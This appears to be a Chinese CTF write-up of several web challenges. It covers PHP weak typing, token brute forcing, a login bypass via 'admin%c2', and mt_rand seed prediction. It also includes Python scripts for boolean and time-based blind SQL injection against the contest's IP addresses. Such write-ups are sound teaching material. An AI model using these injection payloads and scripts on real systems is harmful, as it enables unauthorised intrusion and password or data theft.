签到题
直接源代码代码审计,php弱类型
然后第二关
构造
<?php
class a{
var $key;
}
$b = new a();
$b->key=0;
$c=json_encode($b);
echo $c;
?>
抽抽奖
hhhhh
没有数据传输,因此判断代码在本地。然后在JQuery.js文件里发现JSfuck,解密然后console直接输入getFlag即可
继续抽
直接爆破,脚本如下
import requests
import hashlib
def encode(str):
end = ""
for s in str:
if ord(s)<128:
end+="%x"%(255-(ord(s)+128))
if ord(s)>127:
end+="%x"%(255-(ord(s)-128))
return end
flag = []
for x in range(0,200):
cookies = {'PHPSESSID': '3k2rd4536me3rjsojf473vctd7'}
r = requests.get("http://117.34.111.15:81/token.php",cookies=cookies)
m = hashlib.md5(str(x)).hexdigest()
print x
print "http://117.34.111.15:81/get.php?token="+r.text[1:-1]+"&id="+encode(m)
s = requests.get("http://117.34.111.15:81/get.php?token="+r.text[1:-1]+"&id="+encode(m),cookies=cookies)
flag.append(s.text)
print s.text
print set(flag)
So easy
代码审计发现
这里没有用escape_string,因此存在注入
可是折腾了好久
function show($username){
global $conn;
$sql = "select role from `user` where username ='".$username."'";
$res = $conn ->query($sql);
if($res->num_rows>0){
echo "$username is ".$res->fetch_assoc()['role'];
}else{
die("Don't have this user!");
}
}
然后通过过滤函数,找到了去年sysclover的一篇Writeup
然后才发现我前段时间遇到过这个操作符构造注入了,可是当时比较忙,没时间做,因此技能点没有get
脚本长这样,虽然丑点,但是能跑出passwd
# -*-coding:utf-8-*-
import requests
url="http://117.34.111.15:89/?action=show"
passwd=""
lists="1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm"
for i in xrange(1,33):
print i
for p in lists:
param={'username':"-1'=(ascii(mid((passwd)from("+str(i)+")))="+str(ord(p))+")='0"}
print requests.post(url,data=param).content
if "admin" in requests.post(url,data=param).content:
passwd=passwd+p
break
print passwd
登陆就是flag
登陆这里的admin判断直接用admin%c2这个去绕过,因为刚前段时间看过ph师傅的最近刚写的文章,然后很快就反应过来了
Wrong
随手就出swp文件
3 error_reporting(0);
4 function create_password($pw_length = 10)
5 {
6 $randpwd = "";
7 for ($i = 0; $i < $pw_length; $i++)
8 {
9 $randpwd .= chr(mt_rand(33, 126));
10 }
11 return $randpwd;
12 }
13
14 session_start();
15 mt_srand(time());
16 $pwd=create_password();
17
18 if($pwd==$_GET['pwd'])
19 {
20 if($_SESSION['userLogin']==$_GET['login'])
21 echo "Good job, you get the key";
22 }
23 else
24 {echo "Wrong!";}
刚开始丢给队友做,队友做了好久,然后硬是没刚出来。
看了一下,思路大致如下
$pwd==$_GET['pwd']、$_SESSION['userLogin']==$_GET['login']两个点,第一个可以通过清空cookie,造成NULL==NULL
第二个点则需要本地提前时间生成pwd
pwd生成脚本(注:linux时间改成和服务时间一样,时区最好也改了吧,反正我第一次没改时区没有pass)
1 <?php
2 function create_password($pw_length = 10)
3 {
4 $randpwd = "";
5 for($i=0;$i<$pw_length;$i++)
6 {
7 $randpwd.=chr(mt_rand(33,126));
8 }
9 return $randpwd;
10 }
11 echo date("Y-m-d h:i:sa")."\n";
12 mt_srand(time());
13 $pwd=create_password();
14 echo $pwd;
15 ?>
just a test
不知道是谁,在某个地方插了个弹窗。造成XSS的假象,然后打了一中午,发现什么也没有,就很绝望!
后来队友提醒是不是注入,然后在URL里试了一下真的是注入???exm???
先把脚本放上
# -*- coding:utf-8 -*-
import requests
import time
flag=""
for j in xrange(1,50):
for i in xrange(33,127):
url="http://117.34.111.15:83/chandni-jewel'%20union%20select%20if((select%20ascii(substr(f1ag,"+str(j)+",1))%20from%20test.`fl@g`%20limit%200,1)="+str(i)+",sleep(0.4),1)%2523"
a=time.time()
requests.get(url)
#print time.time()-a
print '.',
if time.time()-a>4:
print chr(i)
flag=flag+str(chr(j))
break
print flag
#database() 5
#database() test
#table1 fl@g
#column f1ag
#http://117.34.111.15:83/chandni-jewel' union select if((select ascii(substr(f1ag," str(j) ",1)) from test.fl@g limit 0,1)=" str(i) ",sleep(0.4),1)%23
#http://117.34.111.15:83/chandni-jewel'%20union%20select%20if((select%20length(column_name)%20from%20information_schema.columns%20limit 1,1)="+str(i)+",sleep(0.4),1)%2523
开始爆Flag始终没有爆出来,又很绝望。
怀疑人生然后把payload放到Bp里结果报错了,才发现表名里有个@,在payload里加个反引号就行了
服务器响应不是很好,跑了很多遍才跑出来flag
